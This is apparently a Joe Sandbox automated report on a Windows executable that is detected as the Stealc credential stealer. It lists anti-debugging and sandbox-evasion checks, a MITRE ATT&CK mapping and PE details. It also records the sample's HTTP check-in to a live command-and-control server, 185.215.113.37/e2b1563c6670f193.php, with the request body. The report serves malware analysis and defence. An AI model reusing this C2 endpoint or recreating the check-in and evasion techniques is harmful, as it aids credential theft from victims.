                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0038ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00394570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00394570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0038DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0038BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0038F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00393EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00393EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003816D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00381160 GetSystemInfo,ExitProcess,0_2_00381160
                Source: file.exe, file.exe, 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1800775191.00000000011BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1800775191.00000000011AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1800775191.0000000001184000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1800775191.000000000113E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13550
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13562
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13547
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13567
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13602
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E109A rdtsc 0_2_005E109A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003845C0 VirtualProtect ?,00000004,00000100,000000000_2_003845C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00399860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00399860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00399750 mov eax, dword ptr fs:[00000030h]0_2_00399750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00397850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00397850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7112, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00399600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00399600
                Source: file.exe, file.exe, 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: eProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00397B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00396920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00396920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00397850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00397850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00397A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00397A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.380000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1759771807.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1800775191.000000000113E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7112, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.380000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1759771807.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1800775191.000000000113E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7112, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory651
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37file.exe, 00000000.00000002.1800775191.000000000113E000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phpva=Tfile.exe, 00000000.00000002.1800775191.0000000001184000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/4Dfile.exe, 00000000.00000002.1800775191.0000000001197000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phphfile.exe, 00000000.00000002.1800775191.00000000011AA000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/01file.exe, 00000000.00000002.1800775191.00000000011A5000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpBafile.exe, 00000000.00000002.1800775191.0000000001184000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          185.215.113.37
                          		unknownPortugal
                          		206894WHOLESALECONNECTIONSNLtrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1528823
                          Start date and time:2024-10-08 10:27:19 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 3s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:1
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 18
                          • Number of non-executed functions: 85
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated

                          Warnings

                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.215.113.37file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          7AeSqNv1rC.exeGet hashmaliciousMicroClip, VidarBrowse
                          • 185.215.113.117
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.947259488047634
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'844'224 bytes
                          MD5:f10c33b85dcdad1afd46afc292250f45
                          SHA1:cbf1860f2913584c90cb369f65cc2f3f9ed07f7d
                          SHA256:fef07dfe69df3e939e6a3bc0e097b4507e052f873bd8d0cffe54508c9ce7e6af
                          SHA512:10506977154e5173fba89780137e3bdf5e7180817637a62bbd00fbef8fc58337ff71cb19a2d821446ace08b3191ce7420b746f1b998f3a63e3de4780221d4e18
                          SSDEEP:24576:k+lZYWfCkenyLbTxc8AK5Km5MsjjXkp/EO+Oqd+kE61X4sEU9oTCCPURcO9GVw3y:kexfiT8H/POs2XjTtVPdAOR
                          TLSH:1E8533D79A73CBDDEB0D46FB12BA22E071BB2025DD879E271B68766C0C1310425D5EB8
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                          File Icon

                          Icon Hash:90cececece8e8eb0

                          Static PE Info

                          General

                          Entrypoint:0xa99000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                          Entrypoint Preview

                          Instruction
                          jmp 00007F402CC5FACAh
                          lar ebx, word ptr [eax+eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          jmp 00007F402CC61AC5h
                          add byte ptr [edi], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], dh
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], ah
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ecx], ah
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [edi], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ecx], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add al, 0Ah
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Rich Headers

                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x25b0000x22800ee243077115dcafa9927faee7f28b9f3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          0x25e0000x29d0000x200da1e3ff8bebdf53ec3c0a590e1a30b5cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          zmsppxmk0x4fb0000x19d0000x19c2006e17a05154c05cb23d2430ed07ac1e1bFalse0.9947472370715802data7.953354892161169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          bobhsqhc0x6980000x10000x400bd24bc7690f1e954fd8fbec4050e777aFalse0.8388671875data6.428862276040028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant0x6990000x30000x220048c8e8ad16c2ca4e10fa9ff8dfa44a4cFalse0.06387867647058823DOS executable (COM)0.7231270511394494IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                          Imports

                          DLLImport
                          kernel32.dlllstrcpy

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-10-08T10:28:21.774078+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Oct 8, 2024 10:28:20.810684919 CEST4973080192.168.2.4185.215.113.37
                          Oct 8, 2024 10:28:20.815936089 CEST8049730185.215.113.37192.168.2.4
                          Oct 8, 2024 10:28:20.816036940 CEST4973080192.168.2.4185.215.113.37
                          Oct 8, 2024 10:28:20.816272974 CEST4973080192.168.2.4185.215.113.37
                          Oct 8, 2024 10:28:20.821115971 CEST8049730185.215.113.37192.168.2.4
                          Oct 8, 2024 10:28:21.530180931 CEST8049730185.215.113.37192.168.2.4
                          Oct 8, 2024 10:28:21.530308008 CEST4973080192.168.2.4185.215.113.37
                          Oct 8, 2024 10:28:21.532651901 CEST4973080192.168.2.4185.215.113.37
                          Oct 8, 2024 10:28:21.537703037 CEST8049730185.215.113.37192.168.2.4
                          Oct 8, 2024 10:28:21.773912907 CEST8049730185.215.113.37192.168.2.4
                          Oct 8, 2024 10:28:21.774077892 CEST4973080192.168.2.4185.215.113.37
                          Oct 8, 2024 10:28:25.583175898 CEST4973080192.168.2.4185.215.113.37

                          HTTP Request Dependency Graph

                          • 185.215.113.37

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.449730185.215.113.37807112C:\Users\user\Desktop\file.exe
                          TimestampBytes transferredDirectionData
                          Oct 8, 2024 10:28:20.816272974 CEST89OUTGET / HTTP/1.1
                          Host: 185.215.113.37
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Oct 8, 2024 10:28:21.530180931 CEST203INHTTP/1.1 200 OK
                          Date: Tue, 08 Oct 2024 08:28:21 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Oct 8, 2024 10:28:21.532651901 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCF
                          Host: 185.215.113.37
                          Content-Length: 211
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 46 39 41 37 46 38 46 31 32 44 34 31 30 36 38 35 34 30 37 36 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 2d 2d 0d 0a
                          Data Ascii: ------JKJDAEBFCBKECBGDBFCFContent-Disposition: form-data; name="hwid"6F9A7F8F12D41068540764------JKJDAEBFCBKECBGDBFCFContent-Disposition: form-data; name="build"doma------JKJDAEBFCBKECBGDBFCF--
                          Oct 8, 2024 10:28:21.773912907 CEST210INHTTP/1.1 200 OK
                          Date: Tue, 08 Oct 2024 08:28:21 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Content-Length: 8
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 59 6d 78 76 59 32 73 3d
                          Data Ascii: YmxvY2s=


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          System Behavior

                          General

                          Target ID:0
                          Start time:04:28:16
                          Start date:08/10/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0x380000
                          File size:1'844'224 bytes
                          MD5 hash:F10C33B85DCDAD1AFD46AFC292250F45
                          Has elevated privileges:true
                          Has administrator privileges:true
